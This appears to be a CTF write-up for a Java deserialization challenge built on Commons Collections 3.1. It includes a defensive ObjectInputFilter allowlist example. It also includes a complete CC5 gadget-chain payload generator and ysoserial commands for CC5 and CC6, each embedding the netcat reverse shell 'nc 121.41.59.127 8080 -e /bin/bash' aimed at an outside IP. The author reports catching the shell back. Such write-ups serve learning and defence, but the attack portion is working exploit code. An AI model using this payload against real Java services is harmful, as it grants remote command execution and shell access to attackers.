It has been a long time since I posted anything.
This one needs some background on Java Commons Collections (CC) gadget chains.
If you are not familiar with them, see these earlier articles of mine:
http://blog.m1kael.cn/index.php/archives/449/
http://blog.m1kael.cn/index.php/archives/492/
http://blog.m1kael.cn/index.php/archives/565/
The challenge ships with its source code.
The entry point is shown here.
It is a plain Java deserialization sink: the input is only Base64-decoded before it reaches ObjectInputStream.readObject(), so our payload just has to be Base64-encoded first.
The dependency is Commons Collections 3.1,
and there is no WAF, so both CC5 and CC6 work.
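Before the payloads, the fix for a sink like this, as an added example that is not code from the challenge or the post: keep the Base64 decode, but give the ObjectInputStream an allowlist filter (java.io.ObjectInputFilter, Java 9 and later) so every class descriptor in the stream is checked before that class's readObject() runs. The Greeting class, the method names and the allowlist contents are assumptions, since the challenge's real DTO is not shown on the page. The demo serializes a harmless javax.management.BadAttributeValueExpException (the JDK class the CC5 chain is triggered from) and shows the unfiltered sink accept it while the filtered one refuses it, without needing Commons Collections on the classpath.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Base64;
import java.util.Set;

public class SafeUnserialize {

    // Assumed DTO standing in for whatever the endpoint legitimately expects.
    public static class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        public final String text;
        public Greeting(String text) { this.text = text; }
    }

    // Classes the endpoint may reconstruct (assumed). Anything else is rejected
    // before its readObject() runs, so a gadget chain never starts executing.
    private static final Set<String> ALLOWED = Set.of(
            Greeting.class.getName(),
            String.class.getName());

    private static final ObjectInputFilter FILTER = info -> {
        Class<?> c = info.serialClass();
        if (c == null) {
            // No class to judge yet: only bound nesting depth and reference count.
            return (info.depth() > 10 || info.references() > 1000)
                    ? ObjectInputFilter.Status.REJECTED
                    : ObjectInputFilter.Status.UNDECIDED;
        }
        while (c.isArray()) c = c.getComponentType();
        if (c.isPrimitive()) return ObjectInputFilter.Status.ALLOWED;
        return ALLOWED.contains(c.getName())
                ? ObjectInputFilter.Status.ALLOWED
                : ObjectInputFilter.Status.REJECTED;
    };

    // Vulnerable form, as the challenge sink is described: decode, then readObject().
    public static Object unsafeUnserialize(String b64) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(b64);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            return in.readObject();
        }
    }

    // Hardened form: same decode, but the stream carries the allowlist filter.
    public static Object safeUnserialize(String b64) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(b64);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static String serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return Base64.getEncoder().encodeToString(bos.toByteArray());
    }

    public static void main(String[] args) throws Exception {
        String benign = serialize(new Greeting("hello"));
        // The CC5 trigger class with a plain String val: harmless here, but the
        // allowlist rejects the class itself, so a real gadget inside it would
        // never be reconstructed.
        String trigger = serialize(new javax.management.BadAttributeValueExpException("x"));

        System.out.println("benign via filter: " + ((Greeting) safeUnserialize(benign)).text);
        System.out.println("trigger without filter: " + unsafeUnserialize(trigger).getClass().getName());
        try {
            safeUnserialize(trigger);
            System.out.println("trigger via filter: accepted (should not happen)");
        } catch (InvalidClassException e) {
            System.out.println("trigger via filter rejected: " + e.getMessage());
        }
    }
}
```

With Commons Collections 3.1 on the classpath the same filter also stops the CC5 and CC6 payloads from this post: the stream is refused at the first class descriptor that is not on the allowlist, before any Transformer is reconstructed. On Java 8u121 and later without the java.io API, the equivalent is sun.misc.ObjectInputFilter or the jdk.serialFilter system property.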
CC5 generator:
package com.bugku.ez_unserialize.controller;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;

// CC5 payload generator for Commons Collections 3.1.
// Trigger: BadAttributeValueExpException.readObject() calls val.toString()
//   -> TiedMapEntry.toString() -> TiedMapEntry.getValue() -> LazyMap.get()
//   -> ChainedTransformer.transform() -> Runtime.getRuntime().exec(cmd)
// The target needs JDK 8u76 or later (earlier readObject() does not call toString())
// and no SecurityManager. On JDK 16+ run this generator with
//   --add-opens java.management/javax.management=ALL-UNNAMED
// or the setAccessible() call below throws InaccessibleObjectException.
public class Cc5 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
        // Reflection chain: Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(cmd)
        ChainedTransformer chain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new Object[]{"nc 121.41.59.127 8080 -e /bin/bash"})});

        // LazyMap runs the transformer for any key missing from the backing map.
        HashMap innerMap = new HashMap();
        LazyMap lazyMap = (LazyMap) LazyMap.decorate(innerMap, chain);
        // TiedMapEntry.toString() calls getValue(), i.e. lazyMap.get(1), which fires the chain.
        TiedMapEntry mapEntry = new TiedMapEntry(lazyMap, 1);

        // The constructor calls toString() on its argument right away, so pass a harmless
        // value and swap the gadget into the private val field through reflection.
        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = BadAttributeValueExpException.class.getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc, mapEntry);

        // Serialize and Base64-encode, since the endpoint Base64-decodes before readObject().
        ByteArrayOutputStream output = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(output);
        outputStream.writeObject(poc);
        outputStream.close();
        System.out.println(Base64.getEncoder().encodeToString(output.toByteArray()));
    }
}
Or generate it directly with ysoserial (with GNU coreutils base64 add -w 0, otherwise the output is wrapped at 76 columns and the basic java.util.Base64 decoder rejects the embedded newlines; if the payload goes into a URL-encoded form field, the '+', '/' and '=' characters must also be percent-encoded or '+' arrives as a space):
java -jar ysoserial.jar CommonsCollections5 "nc 121.41.59.127 8080 -e /bin/bash" | base64 -w 0
or
java -jar ysoserial.jar CommonsCollections6 "nc 121.41.59.127 8080 -e /bin/bash" | base64 -w 0
Then the reverse shell: start a listener locally. Sending the request from Burp did not work for me; only HackBar did.
I got a reverse shell back, though a non-interactive one.